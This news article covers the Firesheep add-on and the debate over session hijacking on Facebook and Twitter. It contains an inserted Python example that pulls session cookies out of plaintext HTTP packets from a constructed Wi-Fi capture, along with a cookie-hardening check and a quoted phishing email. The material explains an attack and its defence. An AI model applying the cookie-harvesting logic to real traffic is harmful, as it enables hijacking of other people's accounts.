Firesheep. That's the name of a new Firefox add-on that lets anyone on a
shared Wi-Fi network capture other users' session cookies and hijack their
logged-in sessions on Facebook, Twitter and other web services. Eric
Butler, a freelance developer in Seattle, created the add-on and released
it at the ToorCon security conference in San Diego over the weekend.
"It's extremely common for web sites to protect your password by
encrypting the initial log-in, but surprisingly uncommon for web sites
to encrypt everything else. This leaves the cookie -- and the user --
vulnerable," Butler noted.
"Facebook is constantly rolling out new 'privacy' features in an endless
attempt to quell the screams of unhappy users, but what's the point
when someone can just take over an account entirely?" he asked. "Twitter
forced all third-party developers to use OAuth,
then immediately released (and promoted) a new version of their
insecure web site. When it comes to user privacy, SSL is the elephant in
the room."
Grey-Hat Tactics
Butler released Firesheep to demonstrate how serious the problem is, but some security researchers don't agree with his tactics. In fact, Beth Jones, a senior threat researcher at Sophos, called it a grey-hat approach.
"I understand that researchers are trying to prove the point that these
social-media sites need to secure their users a little more, but at the
same time they've made it that much easier for people who are hackers --
or for people who even want to dabble in hacking -- to do so," Jones
said. "There are better and more ethical ways to approach this than just
fanning the flames."
Jones does agree that Twitter, Facebook and other web sites could do
more to keep users secure. She pointed to Google's decision to serve all
of Gmail over SSL. With the whole session encrypted, the cookie only ever
travels inside the encrypted connection, so an eavesdropper on the
network sees nothing but ciphertext and has nothing to replay. When
Google took this step, she said, Gmail still worked well and the
precaution came at little expense to Google.
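The two halves of the problem Butler and Jones describe can be shown in a few dozen lines: a passive listener on the same Wi-Fi reads the session cookie from any plain HTTP request, while requests carried over SSL give it nothing to parse. The following Python is an added illustration, not Firesheep's code or anything published by its author; the capture is constructed, the site names and session cookie names are assumed for the example (Firesheep uses per-site handlers, but the names here are made up), and the `set_cookie_is_hardened` check stands in for the server-side fix.

```python
"""Added example: what a passive eavesdropper on a shared Wi-Fi network recovers
when a site encrypts only the login. Constructed traffic and assumed cookie
names; not code from the Firesheep add-on."""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Per-site session cookie names. ASSUMED for illustration; Firesheep ships its
# own per-site handlers and these names are not taken from it.
SITE_HANDLERS: Dict[str, List[str]] = {
    "www.example-social.com": ["session_id", "user_id"],
    "www.example-micro.com": ["_sess", "auth_token"],
}


@dataclass
class Packet:
    src: str        # client address on the shared network
    dst_host: str   # server the client talked to
    port: int       # 80 = plaintext HTTP, 443 = SSL/TLS
    payload: bytes  # application data exactly as seen on the wire


def parse_http_request(payload: bytes) -> Optional[Dict[str, str]]:
    """Parse a plaintext HTTP/1.x request into a dict of lower-cased headers
    plus 'method' and 'path'. Returns None for anything that is not a readable
    request, which is all an eavesdropper gets from a TLS record."""
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return None
    head = text.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    req = {"method": parts[0], "path": parts[1]}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            req[name.strip().lower()] = value.strip()
    return req


def parse_cookies(cookie_header: str) -> Dict[str, str]:
    """Split a Cookie request header into name -> value."""
    cookies: Dict[str, str] = {}
    for pair in cookie_header.split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def harvest_sessions(packets: List[Packet]) -> List[Dict[str, str]]:
    """Return one record per (client, site) whose full set of session cookies
    crossed the network in the clear. Port-443 traffic contributes nothing: the
    listener sees ciphertext only, which is why all-SSL sites are not affected."""
    found: Dict[tuple, Dict[str, str]] = {}
    for pkt in packets:
        if pkt.port != 80:
            continue
        req = parse_http_request(pkt.payload)
        if req is None or "cookie" not in req:
            continue
        host = req.get("host", pkt.dst_host)
        wanted = SITE_HANDLERS.get(host)
        if not wanted:
            continue
        cookies = parse_cookies(req["cookie"])
        session = {n: cookies[n] for n in wanted if n in cookies}
        if len(session) == len(wanted):
            found[(pkt.src, host)] = {"client": pkt.src, "host": host, **session}
    return list(found.values())


def set_cookie_is_hardened(set_cookie: str) -> bool:
    """Server-side fix for a session cookie: the Secure attribute keeps the browser
    from ever sending it over plain HTTP, HttpOnly keeps page scripts from reading it."""
    attrs = {a.strip().split("=")[0].lower() for a in set_cookie.split(";")[1:]}
    return "secure" in attrs and "httponly" in attrs


# Constructed capture: an SSL login (opaque bytes), then the same client browsing
# the site over plain HTTP with the session cookie attached to every request.
CAPTURE = [
    Packet("10.0.0.7", "www.example-social.com", 443, b"\x16\x03\x01\x00\xa5\x01\x00"),
    Packet("10.0.0.7", "www.example-social.com", 80,
           b"GET /home.php HTTP/1.1\r\nHost: www.example-social.com\r\n"
           b"Cookie: datr=abc; session_id=9f1c2e; user_id=100042\r\n\r\n"),
    Packet("10.0.0.9", "www.example-micro.com", 80,
           b"GET / HTTP/1.1\r\nHost: www.example-micro.com\r\n"
           b"Cookie: _sess=Z3Jh; auth_token=7e5a\r\n\r\n"),
    Packet("10.0.0.9", "mail.example.com", 443, b"\x17\x03\x01\x00\x40\x9a\x11"),
]

if __name__ == "__main__":
    for rec in harvest_sessions(CAPTURE):
        print(rec)
    print(set_cookie_is_hardened("session_id=9f1c2e; Path=/"))
    print(set_cookie_is_hardened("session_id=9f1c2e; Path=/; Secure; HttpOnly"))
```

Run against the constructed capture, the listener recovers both clients' session cookies from their plain HTTP requests and nothing at all from the two SSL connections; an attacker who replays those cookie values in their own browser is logged in as the victim without ever seeing a password. The `Secure` attribute on the cookie, combined with serving the whole site over SSL as Gmail does, is what closes the gap.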
Should Facebook, Twitter Do More?
Twitter has had its fair share of breaches. In September, the
onMouseOver incident flooded Twitter with posts that exploited a
cross-site scripting flaw in the site, pushing pornographic links and
self-propagating tweets onto unsuspecting users.
In February, cybercriminals relentlessly attacked Twitter. Many Twitter
users received a direct message or saw tweets with phrases like "This
you???" or "LOL is this you" followed by a link. Users were warned not to
click through because the destination was a phishing site designed to
steal personal information.
Facebook has seen numerous attacks as well. In March, cybercriminals ran
scams that targeted Facebook users, college basketball fans, and
celebrity gossip watchers. One widespread attack was a common ploy
security researchers call the Facebook Password Reset Scam. The
cybercriminals send an e-mail addressed to "user of Facebook" that
reads, "Because of the measures taken to provide safety to our clients,
your password has been changed. You can find your new password in the
attached document."
"I think Facebook and Twitter could be doing more and better, but I also
understand it takes time," Jones said. "There are certain protocols
they have to go through to get everything rolled out, but I think it's
going to happen eventually. I am also very cognizant of the fact that,
as a whole, people don't necessarily care."